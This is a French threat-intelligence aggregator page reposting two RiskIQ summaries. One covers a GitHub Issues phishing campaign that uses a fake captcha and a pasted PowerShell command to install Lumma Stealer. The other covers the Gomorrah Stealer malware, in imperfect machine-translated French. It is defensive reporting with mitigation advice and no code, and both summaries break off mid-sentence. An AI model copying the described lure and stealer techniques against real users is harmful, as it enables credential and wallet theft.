SOC News: Article

One Article Review

Accueil - L'article:

Source	RiskIQ
Identifiant	8580658
Date de publication	2024-09-20 16:51:05 (vue: 2024-09-20 17:18:22)
Titre	Clever \'GitHub Scanner\' campaign abusing repos to push malware (Recyclage)
Texte	## Snapshot Bleeping Computer reports a new phishing campaign that abuses GitHub repositories to distribute the [Lumma Stealer](https://security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad) malware, targeting users through the platform\'s "Issues" feature. ## Description Malicious GitHub users file false "security vulnerability" reports on open-source projects, to lure users into visiting a counterfeit "GitHub Scanner" website. The email alerts are sent from legitimate GitHub servers, originating from the legitimate GitHub email address, notifications@github.com, and signed "Best regards, Github Security Team" in the message body, in attempt to make the messages appear more authentic. In the email, users are asked to contact "github-scanner\[.\]com," not affiliated with GitHub, to learn more about the alleged security issue. When users visit the fraudulent domain, they\'re prompted with a fake captcha, which copies malicious JavaScript code to their clipboard. A subsequent screen instructs them to execute the Windows Run command and paste the copied code. This triggers a PowerShell script that downloads the file \'l6E.exe\' from the malicious domain, which is equipped with anti-detection and persistence capabilities. The file is saved as "SysSetup.exe" in a temporary directory and, when executed, installs the Lumma Stealer malware. Lumma Stealer is designed to steal credentials, cookies, browsing history, and cryptocurrency wallets from the infected device. Bleeping Computer previously [reported](https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-password-stealing-malware-masked-as-fixes/) that Lumma Stealer has been linked to similar attacks, aiming to steal developers\' credentials and compromise source code for potential supply chain attacks. ## Recommendations Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use[Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Organizations can also leverage web browsers that automatically[identify and block malicious websites](https://learn.microsoft.com/deployedge/microsoft-edge-security-smartscreen?ocid=magicti_ta_learndoc), including those used in this phishing campaign. To build resilience against phishing attacks in general, organizations can use[anti-phishing policies](https://docs.microsoft.com/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide) to enable mailbox intelligence settings, as well as configure impersonation protection settings for specific messages and sender domains. Enabling [SafeLinks](https://docs.microsoft.com/microsoft-365/security/office-365-security/safe-links?view=o365-worldwide) ensures real-time protection by scanning at time of delivery and at time of click. - Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-firs
Notes	★★
Envoyé	Oui
Condensat	### © 2024 2024 2147069186 2147117932 365 365/security/defender 365/security/office about abused abuses abusing access access/concept access/overview accessed access policies acquired activate activating address advice: affiliated against age aiming alerts all alleged also anti antivirus any appear apply apps are asked attack attacker attacks attempt attempts authentic auto automatically based been best bleeping bleepingcomputer block blocks body browsers browsing build bullet campaign can capabilities captcha card chain check classes clever click clipboard cloud code com com/azure/active com/deployedge/microsoft com/en com/intel com/microsoft com/news/security/clever com/news/security/github command comments common compliant compromise computer conditional configure contact content continuous cookie cookies copied copies copyright counterfeit cover coverage credential credentials criterion cryptocurrency customers defender delete delivered delivery deployment description designed detection developers device devices directory directory/conditional distribute distribution domain domains downloads edge email emails enable enabling encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforced enhanced ensure ensures entire equipped equivalent evaluated evaluation every evolving exe executable execute executed execution fake false feature file files filtering first fixes/ following fraudulent from general github githubrepositories guidance has here history host hour https://docs https://learn https://security https://www identify impact impersonation including infected infections information infostealer infostealers installs instructs intelligence issue issues javascript l6e learn learndoc learndoc#block learning legitimate leverage linked links list lumma lure machine mail mailbox majority make malicious malware malware/ management manager masked meet message messages microsoft mitigation mitigations mode monitored more mtb mtb&threatid= name=spyware:win32/lummastealer name=spyware:win64/lummastealer name=trojan:win32/lummacstealer name=trojan:win32/lummastealer name=trojan:win64/lumma name=trojan:win64/lummastealer new newly not notifications@github obfuscated ocid=magicti offer office open organizations originating other overview part password paste permission persistence phishing platform points policies polymorphic potential potentially powershell prevalence prevent previously product profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad prohibited projects prompted protect protection protections pua purge push ransomware rapidly read real recheck recommendations reduce reduction reference references regarding regards reported reports repos reproduction requirements reserved resilience response rights rules run running safelinks saved scam scanner scanning screen script scripts security security/defender security/safe security/set security/zero sender sent servers session settings sight signed similar site sites smartscreen snapshot source spam specific spoofed spyware:win32/lummastealer spyware:win64/lummastealer status steal stealer stealing stolen stop subsequent supply support surface sweeping syssetup targeting team techniques temporary tenant theft them themselves thereof these they those threat threats through time tools triggers trojan:win32/lummacstealer trojan:win32/lummastealer trojan:win64/lumma trojan:win64/lummastealer trusted turn unknown unless unwanted us/deployedge/microsoft us/wdsi/threats/malware use used users variants view=o365 visit visiting vulnerability wallets web website websites well when which whichidentifies windows without worldwide written your in  conditional  in
Tags	Ransomware Spam Malware Tool Threat
Stories
Move

Les reprises de l'article (1):

Source	RiskIQ
Identifiant	8579832
Date de publication	2024-09-19 20:13:20 (vue: 2024-09-19 20:18:14)
Titre	GOMORRAH STENER V5.1: Une analyse approfondie d'un malware basé sur .NET Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware
Texte	## Instantané Cyfirma a publié un rapport sur Gomorrrah Stealer, un malware de volet d'informations basé sur .NET qui fonctionne dans un modèle de logiciel malveillant en tant que service (MAAS). ## Description Ce logiciel malveillant sophistiqué cible un large éventail de données sensibles, y compris les mots de passe, les détails de la carte de crédit, les cookies des navigateurs Web, les VPN, les portefeuilles de crypto-monnaie, les applications de messagerie et les clients FTP.Il utilise des techniques d'évasion telles que le débogueur et la détection de l'environnement virtuel, modifie le registre Windows pour la persistance et utilise le code du langage intermédiaire pur (IL) basé sur .NET avec une compilation juste en temps (JIT) pour résister à l'analyse statique. Gomorrrah Stealer infiltre les systèmes en supprimant un fichier DLL, en déménageant ses exécutables et en créant des répertoires dans le dossier temporaire pour organiser des données récoltées.Il capture les informations du système, installé des programmes, exécutant des processus et prend des captures d'écran.Après avoir exfiltrant les données d'un serveur de commande et de contrôle (C2), il supprime les fichiers locaux pour couvrir ses pistes.Le logiciel malveillant est distribué via un canal télégramme, soutenu par un acteur de menace nommé \\ 'lucifer, \' qui le promeut également sur les plateformes de médias sociaux comme YouTube et Facebook. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Vérifiez les paramètres de filtrage des e-mails Office 365 pour vous assurer de bloquer les e-mails, le spam et les e-mails avec des logiciels malveillants.Utilisez [Microsoft Defender pour Office 365] (https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-foro-office-365?ocid=Magicti_Ta_learnDoc) pour une protection et une couverture de phishing améliorées contrenouvelles menaces et variantes polymorphes.Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) et [derete SenteMail] (https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=Magicti_ta_learndoc) en réponse à l'intelligence de menace nouvellement acquise.Allumez [les politiques de pièces jointes de sécurité] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-polies-configure?ocid=Magicti_TA_LearnDoc) pour vérifier les pièces jointes à l'e-mail entrant. - Encourager les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=Magicti_TA_LearnDDoc), qui identifieet bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dans Microsoft Defender Antivirus, ou l'équivalent de votre produit antivirus, pour couvrir les outils et techniques d'attaquant en évolution rapide.Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - appliquer le MFA sur tous les comptes, supprimer les utilisateurs exclus de la MFA et strictement [exiger MFA] (https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-Politique? OCID = magicti_ta_learndoc) de tous les appareils, à tous les endroits, à tout moment. - Activer les méthodes d'authentification sans mot de passe (par exemple, Windows He
Notes	★★
Envoyé	Oui
Condensat	### © 2024 2024 365 365/security/defender 365/security/office about accessed accounts acquired actor advice: after against age all also analysis antivirus any app apps are array article attachments attack attacker authentication authenticator auto based block blocks browser browsers bullet can captures card channel check classes click clicking clients cloud code com/azure/active com/deployedge/microsoft com/en com/microsoft com/research/gomorrah command common compilation components configure content control cookies copyright cover coverage creating credential credentials credit criterion cryptocurrency customers cyfirma data debugger defender delete deletes delivered deployment depth description details detection detects devices different directories directory/authentication/concept directory/authentication/how directory/identity distributed distribution dll dropping due edge email emails employees employs enable enabled encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced ensure enterprise entire environment equivalent evasion even evolving example excluded executable executables execution exfiltrating facebook features fido file files filtering first folder following from ftp gomorrah group guidance harvested hello host hour https://learn https://www identifiesand identity impact inbound including infections infiltrates information infostealer infostealers installed intelligence intermediate intrusions its jit just keys language learndoc learndoc#block learning like links list local locations lucifer maas machine mail majority malicious malware malware/ malware: managed many match media meet messaging methods mfa microsoft mitigation mitigations mode model modifies monitored more mtb name=trojan:win32/gomorrah named net new newly not number obfuscated ocid=magicti off offer office operates organizations organize other overview part password passwordless passwords permission persistence personal phishing phones platforms points policies policy polymorphic possible potentially prevalence prevent processes product programs prohibited promotes prompt protection protection/howto protections pua pure purge ransomware rapidly recheck recommendations recommends reduce reduction refer reference references registry released relocating remind remove report reproduction require requires reserved resist response rights rpx rules running safe scam screenshots scripts secured security/defender security/safe security/zero sensitive sent server service settings should sight site sites smartscreen snapshot social sophisticated spam specific spoofed static status stealer stealing stop stored strictly succeeded such support supported surface sweeping sync#sync syncing system systems takes targets techniques telegram temp theft thereof threat threats time times tools tracks trojan:win32/gomorrah trusted turn typed under unknown unless unwanted us/wdsi/threats/malware use used users uses using variants vaults virtual vpns wallets web websites when where which who wide windows without workplace written your youtube “yes”
Tags	Ransomware Spam Malware Tool Threat
Stories
Move

L'article ne semble pas avoir été repris sur un précédent.